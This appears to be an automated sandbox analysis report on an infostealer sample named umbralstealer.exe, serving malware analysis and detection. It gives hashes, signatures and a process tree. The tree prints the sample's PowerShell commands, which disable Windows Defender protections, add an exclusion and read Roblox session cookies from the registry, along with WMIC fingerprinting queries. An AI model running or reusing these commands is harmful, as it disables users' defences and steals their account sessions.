Analysis
Max time kernel: 120s
Max time network: 121s
Platform: windows7_x64
Resource: win7-20240708-en
Resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
Submitted: 03-09-2024 13:05
Behavioral task: behavioral1
Sample: umbralstealer.exe
Resource: win7-20240708-en

Behavioral task: behavioral2
Sample: umbralstealer.exe
Resource: win10v2004-20240802-en
General
Target: umbralstealer.exe
Size: 229KB
MD5: 83b81dda82a62350b52ee97a12d3163a
SHA1: 3e7c9d5eda676771071fa77ce8f357b0c32673fa
SHA256: b8e51135b2e0a124ac1103a9c4a6f2353d289ffe99611d990c291ae356950ecf
SHA512: e0d0d47479b19287dbb731b0025c458623fa17e77d506756a7e90289abf0c04faa5e655bd2f521ead68d3c8530cb4ecaf1cb1c48e1fe2e03759affe8c0c4ca04
SSDEEP: 6144:lloZM9fsXtioRkts/cnnK6cMlxDKxX8il927De8NhoREb8e1muoi:noZXtlRk83MlxDKxX8il927De8NhoOJ
Malware Config
Signatures
Detect Umbral payload 1 IoCs
resource: behavioral1/memory/2568-1-0x0000000000070000-0x00000000000B0000-memory.dmp
yara_rule: family_umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access or copy of the web browser credential store.

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid   Process
2388  powershell.exe
2656  powershell.exe
2912  powershell.exe
2860  powershell.exe
Drops file in Drivers directory 1 IoCs
description                   ioc                                     Process
File opened for modification  C:\Windows\System32\drivers\etc\hosts  umbralstealer.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow  ioc
6     ip-api.com
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine the videocard installed.
pid   Process
1280  wmic.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid   Process
2388  powershell.exe
2860  powershell.exe
2656  powershell.exe
2692  powershell.exe
2912  powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                          pid   Process
Token: SeDebugPrivilege              2568  umbralstealer.exe
Token: SeDebugPrivilege              2388  powershell.exe
Token: SeDebugPrivilege              2860  powershell.exe
Token: SeDebugPrivilege              2656  powershell.exe
Token: SeDebugPrivilege              2692  powershell.exe
Token: SeIncreaseQuotaPrivilege      1700  wmic.exe
Token: SeSecurityPrivilege           1700  wmic.exe
Token: SeTakeOwnershipPrivilege      1700  wmic.exe
Token: SeLoadDriverPrivilege         1700  wmic.exe
Token: SeSystemProfilePrivilege      1700  wmic.exe
Token: SeSystemtimePrivilege         1700  wmic.exe
Token: SeProfSingleProcessPrivilege  1700  wmic.exe
Token: SeIncBasePriorityPrivilege    1700  wmic.exe
Token: SeCreatePagefilePrivilege     1700  wmic.exe
Token: SeBackupPrivilege             1700  wmic.exe
Token: SeRestorePrivilege            1700  wmic.exe
Token: SeShutdownPrivilege           1700  wmic.exe
Token: SeDebugPrivilege              1700  wmic.exe
Token: SeSystemEnvironmentPrivilege  1700  wmic.exe
Token: SeRemoteShutdownPrivilege     1700  wmic.exe
Token: SeUndockPrivilege             1700  wmic.exe
Token: SeManageVolumePrivilege       1700  wmic.exe
Token: 33                            1700  wmic.exe
Token: 34                            1700  wmic.exe
Token: 35                            1700  wmic.exe
Token: SeIncreaseQuotaPrivilege      1700  wmic.exe
Token: SeSecurityPrivilege           1700  wmic.exe
Token: SeTakeOwnershipPrivilege      1700  wmic.exe
Token: SeLoadDriverPrivilege         1700  wmic.exe
Token: SeSystemProfilePrivilege      1700  wmic.exe
Token: SeSystemtimePrivilege         1700  wmic.exe
Token: SeProfSingleProcessPrivilege  1700  wmic.exe
Token: SeIncBasePriorityPrivilege    1700  wmic.exe
Token: SeCreatePagefilePrivilege     1700  wmic.exe
Token: SeBackupPrivilege             1700  wmic.exe
Token: SeRestorePrivilege            1700  wmic.exe
Token: SeShutdownPrivilege           1700  wmic.exe
Token: SeDebugPrivilege              1700  wmic.exe
Token: SeSystemEnvironmentPrivilege  1700  wmic.exe
Token: SeRemoteShutdownPrivilege     1700  wmic.exe
Token: SeUndockPrivilege             1700  wmic.exe
Token: SeManageVolumePrivilege       1700  wmic.exe
Token: 33                            1700  wmic.exe
Token: 34                            1700  wmic.exe
Token: 35                            1700  wmic.exe
Token: SeIncreaseQuotaPrivilege      1252  wmic.exe
Token: SeSecurityPrivilege           1252  wmic.exe
Token: SeTakeOwnershipPrivilege      1252  wmic.exe
Token: SeLoadDriverPrivilege         1252  wmic.exe
Token: SeSystemProfilePrivilege      1252  wmic.exe
Token: SeSystemtimePrivilege         1252  wmic.exe
Token: SeProfSingleProcessPrivilege  1252  wmic.exe
Token: SeIncBasePriorityPrivilege    1252  wmic.exe
Token: SeCreatePagefilePrivilege     1252  wmic.exe
Token: SeBackupPrivilege             1252  wmic.exe
Token: SeRestorePrivilege            1252  wmic.exe
Token: SeShutdownPrivilege           1252  wmic.exe
Token: SeDebugPrivilege              1252  wmic.exe
Token: SeSystemEnvironmentPrivilege  1252  wmic.exe
Token: SeRemoteShutdownPrivilege     1252  wmic.exe
Token: SeUndockPrivilege             1252  wmic.exe
Token: SeManageVolumePrivilege       1252  wmic.exe
Token: 33                            1252  wmic.exe
Token: 34                            1252  wmic.exe
Suspicious use of WriteProcessMemory 27 IoCs
description                       pid   Process            procid_target
PID 2568 wrote to memory of 2388  2568  umbralstealer.exe  30
PID 2568 wrote to memory of 2388  2568  umbralstealer.exe  30
PID 2568 wrote to memory of 2388  2568  umbralstealer.exe  30
PID 2568 wrote to memory of 2860  2568  umbralstealer.exe  32
PID 2568 wrote to memory of 2860  2568  umbralstealer.exe  32
PID 2568 wrote to memory of 2860  2568  umbralstealer.exe  32
PID 2568 wrote to memory of 2656  2568  umbralstealer.exe  34
PID 2568 wrote to memory of 2656  2568  umbralstealer.exe  34
PID 2568 wrote to memory of 2656  2568  umbralstealer.exe  34
PID 2568 wrote to memory of 2692  2568  umbralstealer.exe  36
PID 2568 wrote to memory of 2692  2568  umbralstealer.exe  36
PID 2568 wrote to memory of 2692  2568  umbralstealer.exe  36
PID 2568 wrote to memory of 1700  2568  umbralstealer.exe  38
PID 2568 wrote to memory of 1700  2568  umbralstealer.exe  38
PID 2568 wrote to memory of 1700  2568  umbralstealer.exe  38
PID 2568 wrote to memory of 1252  2568  umbralstealer.exe  41
PID 2568 wrote to memory of 1252  2568  umbralstealer.exe  41
PID 2568 wrote to memory of 1252  2568  umbralstealer.exe  41
PID 2568 wrote to memory of 696   2568  umbralstealer.exe  43
PID 2568 wrote to memory of 696   2568  umbralstealer.exe  43
PID 2568 wrote to memory of 696   2568  umbralstealer.exe  43
PID 2568 wrote to memory of 2912  2568  umbralstealer.exe  45
PID 2568 wrote to memory of 2912  2568  umbralstealer.exe  45
PID 2568 wrote to memory of 2912  2568  umbralstealer.exe  45
PID 2568 wrote to memory of 1280  2568  umbralstealer.exe  47
PID 2568 wrote to memory of 1280  2568  umbralstealer.exe  47
PID 2568 wrote to memory of 1280  2568  umbralstealer.exe  47
Processes
(Process tree: the top-level sample is unindented; its child processes are indented beneath it.)

C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe"
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\umbralstealer.exe'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2388

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2860

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2656

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692

    C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" os get Caption
    - Suspicious use of AdjustPrivilegeToken
    PID:1700

    C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" computersystem get totalphysicalmemory
    - Suspicious use of AdjustPrivilegeToken
    PID:1252

    C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic.exe" csproduct get uuid
    PID:696

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2912

    C:\Windows\System32\Wbem\wmic.exe
    Command line: "wmic" path win32_VideoController get name
    - Detects videocard installed
    PID:1280
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GEZAWL7SZN5Y6TDGD3FR.temp
Filesize: 7KB
MD5: 8981a3e6b9ced7539ff73bd8be410bc3
SHA1: 62dfcd37bf9fbc863d24d3ad4df434d89841a553
SHA256: beca44435b6cfae210f24a147e7467f13de4826d969fb1ddfe7897f6cc10da8b
SHA512: 7d83044c04ad9ef97ebe640c0a490154c08bb3c208d33208df15b3b13cad4b451176e3401cc5df3eb99815e6a8c52f99479e3052814b4ef39bdd0602162da3b7